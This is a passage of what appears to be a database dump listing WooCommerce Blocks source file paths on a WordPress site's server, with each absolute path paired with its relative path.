o-cart/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/add-to-cart/block.tsx'),(8111,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/add-to-cart/constants.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/add-to-cart/constants.tsx'),(8112,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/add-to-cart/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/add-to-cart/edit.tsx'),(8113,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/add-to-cart/frontend.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/add-to-cart/frontend.ts'),(8114,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/add-to-cart/index.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/add-to-cart/index.ts'),(8115,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/add-to-cart/product-types/external.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/add-to-cart/product-types/external.tsx'),(8116,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/add-to-cart/product-types/grouped.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/add-to-cart/product-types/grouped.tsx'),(8117,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/add-to-cart/product-types/index.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/add-to-cart/product-types/index.ts'),(8118,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/add-to-cart/product-types/simple.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/add-to-cart/product-types/simple.tsx'),(8119,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/add-to-cart/product-types/variable/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/add-to-cart/product-types/variable/index.tsx'),(8120,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/add-to-cart/product-types/variable/types.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/add-to-cart/product-types/variable/types.ts'),(8121,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/add-to-cart/product-types/variable/variation-attributes/attribute-picker.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/add-to-cart/product-types/variable/variation-attributes/attribute-picker.tsx'),(8122,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/add-to-cart/product-types/variable/variation-attributes/attribute-select-control.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/add-to-cart/product-types/variable/variation-attributes/attribute-select-control.tsx'),(8123,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/add-to-cart/product-types/variable/variation-attributes/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/add-to-cart/product-types/variable/variation-attributes/index.tsx'),(8124,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/add-to-cart/product-types/variable/variation-attributes/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/add-to-cart/product-types/variable/variation-attributes/style.scss'),(8125,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/add-to-cart/product-types/variable/variation-attributes/test/index.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/add-to-cart/product-types/variable/variation-attributes/test/index.ts'),(8126,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/add-to-cart/product-types/variable/variation-attributes/utils.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/add-to-cart/product-types/variable/variation-attributes/utils.ts'),(8127,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/add-to-cart/shared/add-to-cart-button.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/add-to-cart/shared/add-to-cart-button.tsx'),(8128,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/add-to-cart/shared/index.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/add-to-cart/shared/index.ts'),(8129,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/add-to-cart/shared/product-unavailable.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/add-to-cart/shared/product-unavailable.tsx'),(8130,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/add-to-cart/shared/quantity-input.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/add-to-cart/shared/quantity-input.tsx'),(8131,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/add-to-cart/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/add-to-cart/style.scss'),(8132,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/add-to-cart-form/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/add-to-cart-form/block.json'),(8133,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/add-to-cart-form/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/add-to-cart-form/edit.tsx'),(8134,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/add-to-cart-form/editor.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/add-to-cart-form/editor.scss'),(8135,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/add-to-cart-form/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/add-to-cart-form/index.tsx'),(8136,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/add-to-cart-form/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/add-to-cart-form/style.scss'),(8137,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/average-rating/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/average-rating/block.json'),(8138,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/average-rating/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/average-rating/block.tsx'),(8139,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/average-rating/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/average-rating/edit.tsx'),(8140,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/average-rating/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/average-rating/index.tsx'),(8141,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/average-rating/support.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/average-rating/support.ts'),(8142,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/button/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/button/block.json'),(8143,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/button/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/button/block.tsx'),(8144,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/button/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/button/edit.tsx'),(8145,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/button/frontend.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/button/frontend.tsx'),(8146,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/button/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/button/index.tsx'),(8147,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/button/save.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/button/save.tsx'),(8148,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/button/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/button/style.scss'),(8149,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/button/types.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/button/types.ts'),(8150,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/image/attributes.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/image/attributes.ts'),(8151,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/image/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/image/block.tsx'),(8152,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/image/constants.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/image/constants.tsx'),(8153,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/image/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/image/edit.tsx'),(8154,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/image/frontend.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/image/frontend.ts'),(8155,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/image/image-size-settings.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/image/image-size-settings.tsx'),(8156,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/image/index.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/image/index.ts'),(8157,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/image/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/image/style.scss'),(8158,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/image/supports.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/image/supports.ts'),(8159,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/image/test/block.test.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/image/test/block.test.tsx'),(8160,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/image/types.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/image/types.ts'),(8161,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/price/attributes.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/price/attributes.ts'),(8162,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/price/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/price/block.tsx'),(8163,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/price/constants.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/price/constants.tsx'),(8164,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/price/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/price/edit.tsx'),(8165,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/price/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/price/index.tsx'),(8166,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/price/supports.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/price/supports.ts'),(8167,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/price/types.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/price/types.ts'),(8168,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/product-details/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/product-details/block.json'),(8169,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/product-details/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/product-details/block.tsx'),(8170,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/product-details/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/product-details/edit.tsx'),(8171,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/product-details/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/product-details/index.tsx'),(8172,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/product-details/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/product-details/style.scss'),(8173,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/product-details/types.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/product-details/types.ts'),(8174,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/product-image-gallery/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/product-image-gallery/block.json'),(8175,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/product-image-gallery/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/product-image-gallery/edit.tsx'),(8176,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/product-image-gallery/editor.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/product-image-gallery/editor.scss'),(8177,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/product-image-gallery/index.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/product-image-gallery/index.ts'),(8178,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/product-image-gallery/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/product-image-gallery/style.scss'),(8179,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/product-meta/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/product-meta/block.json'),(8180,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/product-meta/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/product-meta/edit.tsx'),(8181,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/product-meta/editor.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/product-meta/editor.scss'),(8182,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/product-meta/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/product-meta/index.tsx'),(8183,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/product-meta/save.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/product-meta/save.tsx'),(8184,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/product-reviews/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/product-reviews/block.json'),(8185,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/product-reviews/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/product-reviews/block.tsx'),(8186,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/product-reviews/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/product-reviews/edit.tsx'),(8187,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/product-reviews/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/product-reviews/index.tsx'),(8188,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/product-reviews/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/product-reviews/style.scss'),(8189,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/product-reviews/types.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/product-reviews/types.ts'),(8190,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/rating/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/rating/block.json'),(8191,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/rating/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/rating/block.tsx'),(8192,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/rating/constants.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/rating/constants.tsx'),(8193,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/rating/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/rating/edit.tsx'),(8194,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/rating/editor.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/rating/editor.scss'),(8195,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/rating/index.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/rating/index.ts'),(8196,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/rating/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/rating/style.scss'),(8197,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/rating/support.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/rating/support.ts'),(8198,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/rating/types.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/rating/types.ts'),(8199,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/rating-counter/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/rating-counter/block.json'),(8200,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/rating-counter/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/rating-counter/block.tsx'),(8201,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/rating-counter/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/rating-counter/edit.tsx'),(8202,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/rating-counter/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/rating-counter/index.tsx'),(8203,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/rating-counter/support.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/rating-counter/support.ts'),(8204,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/rating-counter/types.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/rating-counter/types.ts'),(8205,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/rating-stars/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/rating-stars/block.json'),(8206,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/rating-stars/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/rating-stars/block.tsx'),(8207,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/rating-stars/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/rating-stars/edit.tsx'),(8208,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/rating-stars/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/rating-stars/index.tsx'),(8209,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/rating-stars/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/rating-stars/style.scss'),(8210,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/rating-stars/support.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/rating-stars/support.ts'),(8211,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/rating-stars/types.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/rating-stars/types.ts'),(8212,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/related-products/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/related-products/block.json'),(8213,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/related-products/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/related-products/edit.tsx'),(8214,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/related-products/editor.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/related-products/editor.scss'),(8215,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/related-products/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/related-products/index.tsx'),(8216,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/atomic/blocks/product-elements/related-products/sav